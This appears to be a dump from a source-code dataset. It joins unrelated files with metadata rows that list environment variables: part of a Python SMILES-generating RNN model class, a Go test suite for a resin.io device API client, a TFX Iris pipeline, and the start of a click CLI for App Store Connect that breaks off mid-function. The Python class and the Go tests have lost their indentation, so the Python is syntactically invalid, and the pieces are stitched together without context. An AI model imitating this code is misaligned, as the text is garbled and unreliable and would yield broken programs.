# layer["config"]["return_sequences"] = True
# Define the sample_model using the modified config file
sample_model = Model.from_config(config)
# Copy the trained weights from the trained batch_model to the untrained sample_model
for layer in sample_model.layers:
# Get weights from the batch_model
weights = self.model.get_layer(layer.name).get_weights()
# Set the weights to the sample_model
sample_model.get_layer(layer.name).set_weights(weights)
if batch_input_length == 1:
self.__sample_model = sample_model
elif batch_input_length > 1:
self.__multi_sample_model = sample_model
return config
def __load(self, model_name):
"""
Load complete model from a zip file.
To be called within __init__.
"""
print("Loading model.")
tstart = datetime.now()
# Temporary directory to extract the zipped information
with tempfile.TemporaryDirectory() as dirpath:
# Unzip the directory that contains the saved model(s)
with zipfile.ZipFile(model_name + ".zip", "r") as zip_ref:
zip_ref.extractall(dirpath)
# Load metadata
metadata = pickle.load(open(dirpath + "/metadata.pickle", "rb"))
# Re-load metadata
self.__dict__.update(metadata)
# Load the model
self.__model = load_model(dirpath + "/model.h5")
# Build sample_model out of the trained batch_model
self.__build_sample_model(batch_input_length=1) # Single-output model
self.__build_sample_model(
batch_input_length=256
) # Multi-output model
print("Loading finished in %i seconds." % ((datetime.now() - tstart).seconds))
"""
Public methods.
"""
def fit(
self,
model_name,
epochs,
lr,
mini_epochs,
patience,
gpus=1,
workers=1,
use_multiprocessing=False,
verbose=2,
max_queue_size=10,
clipvalue=0,
save_period=5,
checkpoint_dir="/",
lr_decay=False,
lr_warmup=False,
sch_epoch_to_start=500,
sch_last_epoch=999,
sch_lr_init=1e-3,
sch_lr_final=1e-6,
):
"""
Fit the full model to the training data.
Supports multi-gpu training if gpus set to >1.
# Arguments
kwargs:
model_name : base name for the checkpoints - string
epochs : number of epochs to train in total - int
lr : initial learning rate of the training - float
mini_epochs : number of dividends of an epoch (==1 means no mini_epochs) - int
patience : minimum consecutive mini_epochs of stagnated learning rate to consider
before lowering it - int
gpus : number of gpus to use for multi-gpu training (==1 means single gpu) - int
workers : number of CPU workers - int
use_multiprocessing: flag for Keras multiprocessing - boolean
verbose : verbosity of the training - int
max_queue_size : max size of the generator queue - int
clipvalue : value of gradient clipping - float
save_period : mini_epochs every which to checkpoint the model - int
checkpoint_dir : directory to store the checkpoints - string
lr_decay : flag to use exponential decay of learning rate - boolean
lr_warmup : flag to use warmup for transfer learning - boolean
"""
# Get parameter values if specified
self.__epochs = epochs
self.__lr = lr
self.__clipvalue = clipvalue
# Optimizer
if clipvalue > 0:
print("Using gradient clipping %.2f." % clipvalue)
opt = Adam(lr=self.lr, clipvalue=self.clipvalue)
else:
opt = Adam(lr=self.lr)
checkpoint_file = (
checkpoint_dir + "%s--{epoch:02d}--{val_loss:.4f}--{lr:.7f}" % model_name
)
# If model is untrained, history is blank
try:
history = self.h
# Else, append the history
except:
history = {}
mhcp = ModelAndHistoryCheckpoint(
filepath=checkpoint_file,
model_dict=self.__dict__,
monitor="val_loss",
verbose=1,
mode="min",
period=save_period,
history=history
)
# Training history
self.__h = mhcp.history
if lr_decay:
lr_schedule = LearningRateSchedule(
epoch_to_start=sch_epoch_to_start,
last_epoch=sch_last_epoch,
lr_init=sch_lr_init,
lr_final=sch_lr_final,
)
lr_scheduler = LearningRateScheduler(
schedule=lr_schedule.exp_decay, verbose=1
)
callbacks = [lr_scheduler, mhcp]
elif lr_warmup:
lr_schedule = LearningRateSchedule(
epoch_to_start=sch_epoch_to_start,
last_epoch=sch_last_epoch,
lr_init=sch_lr_init,
lr_final=sch_lr_final,
)
lr_scheduler = LearningRateScheduler(
schedule=lr_schedule.warmup, verbose=1
)
callbacks = [lr_scheduler, mhcp]
else:
rlr = ReduceLROnPlateau(
monitor="val_loss",
factor=0.5,
patience=patience,
min_lr=1e-6,
verbose=1,
min_delta=1e-4,
)
callbacks = [rlr, mhcp]
# Inspect training parameters at the start of the training
self.summary()
# Parallel training on multiple GPUs
if gpus > 1:
parallel_model = multi_gpu_model(self.model, gpus=gpus)
parallel_model.compile(loss="categorical_crossentropy", optimizer=opt)
# This `fit` call will be distributed on all GPUs.
# Each GPU will process (batch_size/gpus) samples per batch.
parallel_model.fit_generator(
self.train_gen,
steps_per_epoch=self.steps_per_epoch / mini_epochs,
epochs=mini_epochs * self.epochs,
validation_data=self.valid_gen,
validation_steps=self.validation_steps / mini_epochs,
callbacks=callbacks,
max_queue_size=max_queue_size,
workers=workers,
use_multiprocessing=use_multiprocessing,
verbose=verbose,
) # 1 to show progress bar
elif gpus == 1:
self.model.compile(loss="categorical_crossentropy", optimizer=opt)
self.model.fit_generator(
self.train_gen,
steps_per_epoch=self.steps_per_epoch / mini_epochs,
epochs=mini_epochs * self.epochs,
validation_data=self.valid_gen,
validation_steps=self.validation_steps / mini_epochs,
callbacks=callbacks,
max_queue_size=10,
workers=workers,
use_multiprocessing=use_multiprocessing,
verbose=verbose,
) # 1 to show progress bar
# Build sample_model out of the trained batch_model
self.__build_sample_model(batch_input_length=1) # Single-output model
self.__build_sample_model(
batch_input_length=self.batch_size
) # Multi-output model
# @timed
def predict(self, temp=1, rng_seed=None):
"""
Generate a single SMILES string.
The states of the RNN are set based on the latent input.
Careful, "latent" must be: the output of self.transform()
or
an array of molecular descriptors.
If temp>0, multinomial sampling is used instead of selecting
the single most probable character at each step.
If temp==1, multinomial sampling without temperature scaling is used.
Returns:
A single SMILES string and its NLL.
"""
# Pass rng_seed for repeatable sampling
if rng_seed is not None:
np.random.seed(rng_seed)
# Reset the states between predictions because RNN is stateful!
self.sample_model.reset_states()
# Prepare the input char
startidx = self.smilesvec1._char_to_int[self.smilesvec1.startchar]
samplevec = np.zeros((1, 1, self.smilesvec1.dims[-1]))
samplevec[0, 0, startidx] = 1
smiles = ""
# Initialize Negative Log-Likelihood (NLL)
NLL = 0
# Loop and predict next char
for i in range(1000):
o = self.sample_model.predict(samplevec)
# Multinomial sampling with temperature scaling
if temp:
temp = abs(temp) # Handle negative values
nextCharProbs = np.log(o) / temp
nextCharProbs = np.exp(nextCharProbs)
nextCharProbs = (
nextCharProbs / nextCharProbs.sum() - 1e-8
) # Re-normalize for float64 to make exactly 1.0 for np.random.multinomial
sampleidx = np.random.multinomial(
1, nextCharProbs.squeeze(), 1
).argmax()
# Else, select the most probable character
else:
sampleidx = np.argmax(o)
samplechar = self.smilesvec1._int_to_char[sampleidx]
if samplechar != self.smilesvec1.endchar:
# Append the new character
smiles += samplechar
samplevec = np.zeros((1, 1, self.smilesvec1.dims[-1]))
samplevec[0, 0, sampleidx] = 1
# Calculate negative log likelihood for the selected character given the sequence so far
NLL -= np.log(o[0][0][sampleidx])
else:
return smiles, NLL
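    # Illustrative sketch of the temperature scaling used above, assuming a toy
    # probability vector (comment only, not executed):
    #
    #   o = np.array([0.7, 0.2, 0.1])
    #   temp = 0.5
    #   p = np.exp(np.log(o) / temp)
    #   p = p / p.sum()          # ~[0.91, 0.07, 0.02]: low temp sharpens the choice
    #   next_idx = np.random.multinomial(1, p, 1).argmax()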
# @timed
def predict_batch(self, temp=1, rng_seed=None):
"""
Generate multiple random SMILES strings.
If temp>0, multinomial sampling is used instead of selecting
the single most probable character at each step.
If temp==1, multinomial sampling without temperature scaling is used.
Low temp leads to elimination of characters with low conditional probabilities.
"""
# Pass rng_seed for repeatable sampling
if rng_seed is not None:
np.random.seed(rng_seed)
# Reset the states between predictions because RNN is stateful!
self.multi_sample_model.reset_states()
# Index of input char "^"
startidx = self.smilesvec1._char_to_int[self.smilesvec1.startchar]
# Vectorize the input char for all SMILES
samplevec = np.zeros((self.batch_input_length, 1, self.smilesvec1.dims[-1]))
samplevec[:, 0, startidx] = 1
# Initialize arrays to store SMILES, their NLLs and their status
smiles = np.array([""] * self.batch_input_length, dtype=object)
NLL = np.zeros((self.batch_input_length,))
finished = np.array([False] * self.batch_input_length)
# Loop and predict next char
for i in range(1000):
o = self.multi_sample_model.predict(
samplevec, batch_size=self.batch_input_length
).squeeze()
# Multinomial sampling with temperature scaling
if temp:
temp = abs(temp) # No negative values
nextCharProbs = np.log(o) / temp
nextCharProbs = np.exp(nextCharProbs) # .squeeze()
# Normalize probabilities
nextCharProbs = (nextCharProbs.T / nextCharProbs.sum(axis=1) - 1e-8).T
sampleidc = np.asarray(
[
np.random.multinomial(1, nextCharProb, 1).argmax()
for nextCharProb in nextCharProbs
]
)
else:
sampleidc = np.argmax(o, axis=1)
samplechars = [self.smilesvec1._int_to_char[idx] for idx in sampleidc]
for idx, samplechar in enumerate(samplechars):
if not finished[idx]:
if samplechar != self.smilesvec1.endchar:
# Append the SMILES with the next character
smiles[idx] += self.smilesvec1._int_to_char[sampleidc[idx]]
samplevec = np.zeros(
(self.batch_input_length, 1, self.smilesvec1.dims[-1])
)
# One-Hot Encode the character
# samplevec[:,0,sampleidc] = 1
for count, sampleidx in enumerate(sampleidc):
samplevec[count, 0, sampleidx] = 1
# Calculate negative log likelihood for the selected character given the sequence so far
NLL[idx] -= np.log(o[idx][sampleidc[idx]])
else:
finished[idx] = True
# print("SMILES has finished at %i" %i)
# If all SMILES are finished, i.e. the endchar "$" has been generated, stop the generation
if finished.sum() == len(finished):
return smiles, NLL
@timed
def get_smiles_nll(self, smiles_ref) -> float:
"""
Calculate the NLL of a given SMILES string if its descriptors are used as RNN states.
Returns:
The NLL of sampling a given SMILES string.
"""
# Reset the states between predictions because RNN is stateful!
self.sample_model.reset_states()
# Prepare the input char
startidx = self.smilesvec1._char_to_int[self.smilesvec1.startchar]
samplevec = np.zeros((1, 1, self.smilesvec1.dims[-1]))
samplevec[0, 0, startidx] = 1
# Initialize Negative Log-Likelihood (NLL)
NLL = 0
# Loop and predict next char
for i in range(1000):
o = self.sample_model.predict(samplevec)
samplechar = smiles_ref[i]
sampleidx = self.smilesvec1._char_to_int[samplechar]
if i != len(smiles_ref) - 1:
samplevec = np.zeros((1, 1, self.smilesvec1.dims[-1]))
samplevec[0, 0, sampleidx] = 1
# Calculate negative log likelihood for the selected character given the sequence so far
NLL -= np.log(o[0][0][sampleidx])
else:
return NLL
@timed
def get_smiles_nll_batch(self, smiles_ref) -> list:
"""
Calculate the individual NLL for a batch of known SMILES strings.
Batch size is equal to self.batch_input_length so reset it if needed.
Returns:
NLL of sampling all listed SMILES.
"""
# Reset the states between predictions because RNN is stateful!
self.multi_sample_model.reset_states()
# Index of input char "^"
startidx = self.smilesvec1._char_to_int[self.smilesvec1.startchar]
# Vectorize the input char for all SMILES
samplevec = np.zeros((self.batch_input_length, 1, self.smilesvec1.dims[-1]))
samplevec[:, 0, startidx] = 1
# Initialize arrays to store NLLs and flag if a SMILES is finished
NLL = np.zeros((self.batch_input_length,))
finished = np.array([False] * self.batch_input_length)
# Loop and predict next char
for i in range(1000):
o = self.multi_sample_model.predict(
samplevec, batch_size=self.batch_input_length
).squeeze()
samplechars = []
for smiles in smiles_ref:
try:
samplechars.append(smiles[i])
except:
# This is a finished SMILES, so "i" exceeds dimensions
samplechars.append("$")
sampleidc = np.asarray(
[self.smilesvec1._char_to_int[char] for char in samplechars]
)
for idx, samplechar in enumerate(samplechars):
if not finished[idx]:
if i != len(smiles_ref[idx]) - 1:
samplevec = np.zeros(
(self.batch_input_length, 1, self.smilesvec1.dims[-1])
)
# One-Hot Encode the character
for count, sampleidx in enumerate(sampleidc):
samplevec[count, 0, sampleidx] = 1
# Calculate negative log likelihood for the selected character given the sequence so far
NLL[idx] -= np.log(o[idx][sampleidc[idx]])
else:
finished[idx] = True
# If all SMILES are finished, i.e. the endchar "$" has been generated, stop the generation
if finished.sum() == len(finished):
return NLL
def summary(self):
"""
Echo the training configuration for inspection.
"""
print(
"\nModel trained with dataset %s that has maxlen=%d and charset=%s for %d epochs."
% (self.dataset_name, self.maxlen, self.charset, self.epochs)
)
print(
"noise_std: %.6f, lstm_dim: %d, dec_layers: %d, td_dense_dim: %d, batch_size: %d, codelayer_dim: %d, lr: %.6f."
% (
self.noise_std,
self.lstm_dim,
self.dec_layers,
self.td_dense_dim,
self.batch_size,
self.codelayer_dim,
self.lr,
)
)
def get_graphs(self):
"""
Export the graphs of the model and its submodels to png files.
Requires "pydot" and "graphviz" to be installed (pip install graphviz && pip install pydot).
"""
try:
from keras.utils import plot_model
from keras.utils.vis_utils import model_to_dot
# from IPython.display import SVG
plot_model(self.model, to_file="model.png")
print("Model exported to png.")
except:
print("Check pydot and graphviz installation.")
@timed
def save(self, model_name):
"""
Save model in a zip file.
"""
with tempfile.TemporaryDirectory() as dirpath:
# Save the Keras model
self.model.save(dirpath + "/model.h5")
# Exclude unpicklable and unwanted attributes
excl_attr = [
"_DDC__mode", # excluded because it is always identified within self.__init__()
"_DDC__train_gen", # unpicklable
"_DDC__valid_gen", # unpicklable
"_DDC__sample_model", # unpicklable
"_DDC__multi_sample_model", # unpicklable
"_DDC__model",
] # unpicklable
# Cannot deepcopy self.__dict__ because of Keras' thread lock so this is
# bypassed by popping and re-inserting the unpicklable attributes
to_add = {}
# Remove unpicklable attributes
for attr in excl_attr:
to_add[attr] = self.__dict__.pop(attr, None)
# Pickle metadata, i.e. almost everything but the Keras models and generators
pickle.dump(self.__dict__, open(dirpath + "/metadata.pickle", "wb"))
# Zip directory with its contents
shutil.make_archive(model_name, "zip", dirpath)
# Finally, re-load the popped elements for the model to be usable
for attr in excl_attr:
self.__dict__[attr] = to_add[attr]
print("Model saved.")
|
[] |
[] |
[
"TF_CPP_MIN_LOG_LEVEL\""
] |
[]
|
["TF_CPP_MIN_LOG_LEVEL\""]
|
python
| 1 | 0 | |
device_test.go
|
package resingo
import (
"net/http"
"os"
"testing"
"time"
)
func TestDevice(t *testing.T) {
config := &Config{
Username: ENV.Username,
Password: ENV.Password,
ResinEndpoint: apiEndpoint,
}
client := &http.Client{}
ctx := &Context{
Client: client,
Config: config,
}
err := Login(ctx, Credentials)
if err != nil {
t.Fatal(err)
}
appName := "device_test"
app, err := AppCreate(ctx, appName, RaspberryPi3)
if err != nil {
t.Fatal(err)
}
defer func() {
_, _ = AppDelete(ctx, app.ID)
}()
maxDevices := 4
devices := make([]struct {
uuid string
dev *Device
}, maxDevices)
for i := 0; i < maxDevices; i++ {
uid, err := GenerateUUID()
if err != nil {
t.Fatal(err)
}
devices[i].uuid = uid
}
t.Run("Register", func(ts *testing.T) {
for _, d := range devices {
testDevRegister(ctx, ts, appName, d.uuid)
}
})
t.Run("GetByUUID", func(ts *testing.T) {
for i, d := range devices {
devices[i].dev = testDevGetByUUID(ctx, ts, d.uuid)
}
})
t.Run("GetByName", func(ts *testing.T) {
for _, d := range devices {
testDevGetByName(ctx, ts, d.dev.Name)
}
})
t.Run("GetAllByApp", func(ts *testing.T) {
testDevGetAllByApp(ctx, ts, app.ID, maxDevices)
})
t.Run("GetAll", func(ts *testing.T) {
testDevGetAll(ctx, ts, appName, maxDevices)
})
t.Run("Rename", func(ts *testing.T) {
testDevRename(ctx, ts, "avocado", devices[0].uuid)
})
t.Run("GetApp", func(ts *testing.T) {
testDevGetApp(ctx, ts, devices[0].uuid, appName)
})
t.Run("EnableURL", func(ts *testing.T) {
uuid := os.Getenv("RESINTEST_REALDEVICE_UUID")
if uuid == "" {
ts.Skip("missing RESINTEST_REALDEVICE_UUID")
}
testDevEnableURL(ctx, ts, devices[0].uuid)
})
t.Run("DisableURL", func(ts *testing.T) {
uuid := os.Getenv("RESINTEST_REALDEVICE_UUID")
if uuid == "" {
ts.Skip("missing RESINTEST_REALDEVICE_UUID")
}
testDevDisableURL(ctx, ts, devices[0].uuid)
})
t.Run("Delete", func(ts *testing.T) {
u, _ := GenerateUUID()
d, err := DevRegister(ctx, appName, u)
if err != nil {
ts.Fatal(err)
}
err = DevDelete(ctx, d.ID)
if err != nil {
ts.Fatal(err)
}
_, err = DevGetByUUID(ctx, u)
if err != ErrDeviceNotFound {
ts.Errorf("expected %s got %s", ErrDeviceNotFound.Error(), err.Error())
}
})
t.Run("Note", func(ts *testing.T) {
note := "hello,world"
err := DevNote(ctx, devices[0].dev.ID, note)
if err != nil {
ts.Fatal(err)
}
})
env := []struct {
key, value string
}{
{"Mad", "Scientist"},
{"MONIKER", "IOT"},
}
t.Run("CreateEnv", func(ts *testing.T) {
for _, v := range devices {
for _, e := range env {
en, err := EnvDevCreate(ctx, v.dev.ID, e.key, e.value)
if err != nil {
ts.Error(err)
}
if en.Name != e.key {
ts.Errorf("expected %s got %s", e.key, en.Name)
}
}
}
})
t.Run("EnvGetAll", func(ts *testing.T) {
for _, v := range devices {
envs, err := EnvDevGetAll(ctx, v.dev.ID)
if err != nil {
ts.Error(err)
}
if len(envs) != len(env) {
ts.Errorf("expected %d got %d", len(env), len(envs))
}
}
})
t.Run("EnvUpdate", func(ts *testing.T) {
envs, err := EnvDevGetAll(ctx, devices[0].dev.ID)
if err != nil {
ts.Fatal(err)
}
for _, e := range envs {
err := EnvDevUpdate(ctx, e.ID, e.Name)
if err != nil {
ts.Error(err)
}
}
})
t.Run("EnvDelete", func(ts *testing.T) {
envs, err := EnvDevGetAll(ctx, devices[0].dev.ID)
if err != nil {
ts.Fatal(err)
}
for _, e := range envs {
err := EnvDevDelete(ctx, e.ID)
if err != nil {
ts.Error(err)
}
}
})
}
func testDevGetAll(ctx *Context, t *testing.T, appName string, expect int) {
dev, err := DevGetAll(ctx)
if err != nil {
t.Fatal(err)
}
if len(dev) < expect {
t.Errorf("expected %d devices got %d ", expect, len(dev))
}
}
func testDevRegister(ctx *Context, t *testing.T, appname, uuid string) {
dev, err := DevRegister(ctx, appname, uuid)
if err != nil {
t.Error(err)
}
if dev != nil {
if dev.UUID != uuid {
t.Error("device uuid mismatch")
}
}
}
func testDevGetByUUID(ctx *Context, t *testing.T, uuid string) *Device {
dev, err := DevGetByUUID(ctx, uuid)
if err != nil {
t.Fatal(err)
}
if dev.UUID != uuid {
t.Fatalf("expected %s got %s", uuid, dev.UUID)
}
return dev
}
func testDevGetByName(ctx *Context, t *testing.T, name string) {
dev, err := DevGetByName(ctx, name)
if err != nil {
t.Fatal(err)
}
if dev.Name != name {
t.Errorf("expected %s got %s", name, dev.Name)
}
}
func testDevGetAllByApp(ctx *Context, t *testing.T, appID int64, expect int) {
dev, err := DevGetAllByApp(ctx, appID)
if err != nil {
t.Fatal(err)
}
if len(dev) != expect {
t.Errorf("expected %d devies got %d", expect, len(dev))
}
}
func testDevRename(ctx *Context, t *testing.T, newName string, uuid string) {
err := DevRename(ctx, uuid, newName)
if err != nil {
t.Fatal(err)
}
dev, err := DevGetByUUID(ctx, uuid)
if err != nil {
t.Fatal(err)
}
if dev.Name != newName {
t.Errorf("expected %s got %s", newName, dev.Name)
}
}
func testDevGetApp(ctx *Context, t *testing.T, uuid, appName string) {
app, err := DevGetApp(ctx, uuid)
if err != nil {
t.Fatal(err)
}
if app.Name != appName {
t.Errorf("expected %s got %s", appName, app.Name)
}
}
func testDevEnableURL(ctx *Context, t *testing.T, uuid string) {
err := DevEnableURL(ctx, uuid)
if err != nil {
t.Fatal(err)
}
dev, err := DevGetByUUID(ctx, uuid)
if err != nil {
t.Fatal(err)
}
if !dev.WebAccessible {
t.Error("the device should be web accessible")
}
}
func testDevDisableURL(ctx *Context, t *testing.T, uuid string) {
err := DevDisableURL(ctx, uuid)
if err != nil {
t.Fatal(err)
}
dev, err := DevGetByUUID(ctx, uuid)
if err != nil {
t.Fatal(err)
}
if dev.WebAccessible {
t.Error("the device should not be web accessible")
}
}
func TestDump(t *testing.T) {
config := &Config{
Username: ENV.Username,
Password: ENV.Password,
ResinEndpoint: apiEndpoint,
}
client := &http.Client{}
ctx := &Context{
Client: client,
Config: config,
}
err := Login(ctx, Credentials)
if err != nil {
t.Fatal(err)
}
//d, _ := DevGetByUUID(ctx, "b594dafa5fd01be0a029a44e64e657d58c0f4d31652c956712b687e3f331a6")
//fmt.Println(d.LogsChannel)
uuid := "b594dafa5fd01be0a029a44e64e657d58c0f4d31652c956712b687e3f331a6"
lg, err := NewLogs(ctx)
if err != nil {
t.Fatal(err)
}
go func() {
err = lg.Log(uuid, os.Stdout)
if err != nil {
			t.Error(err)
}
}()
time.Sleep(30 * time.Second)
lg.Close()
}
|
[
"\"RESINTEST_REALDEVICE_UUID\"",
"\"RESINTEST_REALDEVICE_UUID\""
] |
[] |
[
"RESINTEST_REALDEVICE_UUID"
] |
[]
|
["RESINTEST_REALDEVICE_UUID"]
|
go
| 1 | 0 | |
tfx/examples/iris/iris_pipeline_native_keras.py
|
# Lint as: python2, python3
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Iris flowers example using TFX."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from typing import Text
import absl
import tensorflow_model_analysis as tfma
from tfx.components import CsvExampleGen
from tfx.components import Evaluator
from tfx.components import ExampleValidator
from tfx.components import Pusher
from tfx.components import ResolverNode
from tfx.components import SchemaGen
from tfx.components import StatisticsGen
from tfx.components import Trainer
from tfx.components import Transform
from tfx.components.base import executor_spec
from tfx.components.trainer.executor import GenericExecutor
from tfx.dsl.experimental import latest_blessed_model_resolver
from tfx.orchestration import metadata
from tfx.orchestration import pipeline
from tfx.orchestration.beam.beam_dag_runner import BeamDagRunner
from tfx.proto import pusher_pb2
from tfx.proto import trainer_pb2
from tfx.types import Channel
from tfx.types.standard_artifacts import Model
from tfx.types.standard_artifacts import ModelBlessing
from tfx.utils.dsl_utils import external_input
_pipeline_name = 'iris_native_keras'
# This example assumes that Iris flowers data is stored in ~/iris/data and the
# utility function is in ~/iris. Feel free to customize as needed.
_iris_root = os.path.join(os.environ['HOME'], 'iris')
_data_root = os.path.join(_iris_root, 'data')
# Python module file to inject customized logic into the TFX components. The
# Transform and Trainer both require user-defined functions to run successfully.
_module_file = os.path.join(_iris_root, 'iris_utils_native_keras.py')
# Path which can be listened to by the model server. Pusher will output the
# trained model here.
_serving_model_dir = os.path.join(_iris_root, 'serving_model', _pipeline_name)
# Directory and data locations. This example assumes all of the flowers
# example code and metadata library is relative to $HOME, but you can store
# these files anywhere on your local filesystem.
_tfx_root = os.path.join(os.environ['HOME'], 'tfx')
_pipeline_root = os.path.join(_tfx_root, 'pipelines', _pipeline_name)
# Sqlite ML-metadata db path.
_metadata_path = os.path.join(_tfx_root, 'metadata', _pipeline_name,
'metadata.db')
def _create_pipeline(pipeline_name: Text, pipeline_root: Text, data_root: Text,
module_file: Text, serving_model_dir: Text,
metadata_path: Text,
direct_num_workers: int) -> pipeline.Pipeline:
"""Implements the Iris flowers pipeline with TFX."""
examples = external_input(data_root)
# Brings data into the pipeline or otherwise joins/converts training data.
example_gen = CsvExampleGen(input=examples)
# Computes statistics over data for visualization and example validation.
statistics_gen = StatisticsGen(examples=example_gen.outputs['examples'])
# Generates schema based on statistics files.
schema_gen = SchemaGen(
statistics=statistics_gen.outputs['statistics'], infer_feature_shape=True)
# Performs anomaly detection based on statistics and data schema.
example_validator = ExampleValidator(
statistics=statistics_gen.outputs['statistics'],
schema=schema_gen.outputs['schema'])
# Performs transformations and feature engineering in training and serving.
transform = Transform(
examples=example_gen.outputs['examples'],
schema=schema_gen.outputs['schema'],
module_file=module_file)
  # Uses a user-provided Python function that trains a Keras model.
trainer = Trainer(
module_file=module_file,
custom_executor_spec=executor_spec.ExecutorClassSpec(GenericExecutor),
examples=transform.outputs['transformed_examples'],
transform_graph=transform.outputs['transform_graph'],
schema=schema_gen.outputs['schema'],
train_args=trainer_pb2.TrainArgs(num_steps=2000),
eval_args=trainer_pb2.EvalArgs(num_steps=5))
# Get the latest blessed model for model validation.
model_resolver = ResolverNode(
instance_name='latest_blessed_model_resolver',
resolver_class=latest_blessed_model_resolver.LatestBlessedModelResolver,
model=Channel(type=Model),
model_blessing=Channel(type=ModelBlessing))
  # Uses TFMA to compute evaluation statistics over features of a model and
# perform quality validation of a candidate model (compared to a baseline).
eval_config = tfma.EvalConfig(
model_specs=[tfma.ModelSpec(label_key='variety')],
slicing_specs=[tfma.SlicingSpec()],
metrics_specs=[
tfma.MetricsSpec(
thresholds={
'sparse_categorical_accuracy':
tfma.config.MetricThreshold(
value_threshold=tfma.GenericValueThreshold(
lower_bound={'value': 0.6}),
change_threshold=tfma.GenericChangeThreshold(
direction=tfma.MetricDirection.HIGHER_IS_BETTER,
absolute={'value': -1e-10}))
})
])
evaluator = Evaluator(
examples=example_gen.outputs['examples'],
model=trainer.outputs['model'],
baseline_model=model_resolver.outputs['model'],
# Change threshold will be ignored if there is no baseline (first run).
eval_config=eval_config)
# Checks whether the model passed the validation steps and pushes the model
# to a file destination if check passed.
pusher = Pusher(
model=trainer.outputs['model'],
model_blessing=evaluator.outputs['blessing'],
push_destination=pusher_pb2.PushDestination(
filesystem=pusher_pb2.PushDestination.Filesystem(
base_directory=serving_model_dir)))
return pipeline.Pipeline(
pipeline_name=pipeline_name,
pipeline_root=pipeline_root,
components=[
example_gen,
statistics_gen,
schema_gen,
example_validator,
transform,
trainer,
model_resolver,
evaluator,
pusher,
],
enable_cache=True,
metadata_connection_config=metadata.sqlite_metadata_connection_config(
metadata_path),
# TODO(b/142684737): The multi-processing API might change.
beam_pipeline_args=['--direct_num_workers=%d' % direct_num_workers],
)
# To run this pipeline from the python CLI:
# $python iris_pipeline_native_keras.py
if __name__ == '__main__':
absl.logging.set_verbosity(absl.logging.INFO)
BeamDagRunner().run(
_create_pipeline(
pipeline_name=_pipeline_name,
pipeline_root=_pipeline_root,
data_root=_data_root,
module_file=_module_file,
serving_model_dir=_serving_model_dir,
metadata_path=_metadata_path,
# 0 means auto-detect based on the number of CPUs available during
# execution time.
direct_num_workers=0))
| [] | [] | ["HOME"] | [] | ["HOME"] | python | 1 | 0 | |
connect_apk/main.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'yuyuan yue'
import sys,os,json
from common import connectool
from connectapi import ConnectApi
import click
@click.group()
@click.option('-k','--apikey','apikey',metavar='',help='app store connect api key',required=True)
@click.option('-i','--issuer','issuer_id',metavar='',help='app store connect issuer id',required=True)
@click.option('-p','--privatekey_path','privatekey_path',type=click.Path(exists=True),metavar='',help='privatekey file path , default linux user root path ".private_keys"')
@click.pass_context
def cli(ctx, apikey, issuer_id,privatekey_path):
'''
App Store Connect API CLI in Python; authorizes with an apikey, private_key and issuer_id.
How to get the apikey, private_key and issuer_id? https://developer.apple.com/documentation/appstoreconnectapi
'''
if privatekey_path:
if apikey in privatekey_path:
ctx.obj = ConnectApi(apikey,issuer_id,privatekey_path)
else:
connectool.raiseError('private key path error apikey '+apikey+' not in '+privatekey_path)
else:
ctx.obj = ConnectApi(apikey,issuer_id,privatekey_path)
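# A hedged usage sketch of the CLI (the key and issuer id below are placeholders,
# not real credentials):
#
#   python main.py -k ABC123DEFG -i 11111111-2222-3333-4444-555555555555 devices --limit 10 --sort id
#
# Global auth options (-k/-i/-p) come before the subcommand; each subcommand then
# takes its own options as defined below.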
@click.command()
@click.option('-n','--name','name',metavar='',help='device name',required=True)
@click.option('-u','--udid','udid',metavar='',help='device udid',required=True)
@click.pass_obj
def registerdevice(api,name,udid):
'''register device into app store connect with name and udid '''
result = api.register_device(name,udid)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-l','--limit','limit',default=100,metavar='', help='the devices count,default 100')
@click.option('-s','--sort','sort',default='id',metavar='',help='the devices sort,default id')
@click.pass_obj
def devices(api,limit,sort):
'''list devices with limit and sort '''
result = api.list_devices(limit,sort)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-c','--csr_path','csr_path',type=click.Path(exists=True),metavar='',help='certificate CSR request file path',required=True)
@click.option('-o','--out','out_path',type=click.Path(exists=True),default=lambda: os.environ.get('HOME', ''),metavar='',help='certificate file out path , default user root path')
@click.option('-t','--type','type',type=click.Choice(['IOS_DEVELOPMENT','IOS_DISTRIBUTION']),default='IOS_DEVELOPMENT',metavar='',help='the certificate type,choice:[IOS_DEVELOPMENT,IOS_DISTRIBUTION] default IOS_DEVELOPMENT')
@click.pass_obj
def registercertificate(api,csr_path,out_path,type):
'''register certificate with csr_path,out_path and type'''
result = api.register_certificate(csr_path=csr_path,out_path=out_path,type=type)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-i','--id','id',metavar='', help='the certificate id',required=True)
@click.pass_obj
def deletecertificate(api,id):
'''delete certificate with id '''
result = api.delete_certificate(id)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-l','--limit','limit',default=100,metavar='', help='the certificates count,default 100')
@click.option('-s','--sort','sort',default='id',metavar='',help='the certificates sort,default id')
@click.pass_obj
def certificates(api,limit,sort):
'''list certificate with limit and sort '''
result = api.list_certificates(limit,sort)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-b','--bundleid','bundleid',metavar='',help='bundle id',required=True)
@click.option('-t','--teamid','teamid',metavar='',help='team id',required=True)
@click.option('-n','--name','name',metavar='',help='bundle id name',required=True)
@click.pass_obj
def registerbundleid(api,bundleid,teamid,name):
'''register bundle id into app store connect with bundle_id team_id and name '''
result = api.register_bundle_id(bundleid,teamid,name)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-l','--limit','limit',default=100,metavar='', help='the bundleid count,default 100')
@click.option('-s','--sort','sort',default='id',metavar='',help='the bundleid sort,default id')
@click.pass_obj
def bundleids(api,limit,sort):
'''list bundleids with limit and sort '''
result = api.list_bundle_ids(limit,sort)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-i','--id','id',metavar='', help='the bundleid id',required=True)
@click.pass_obj
def deletebundleid(api,id):
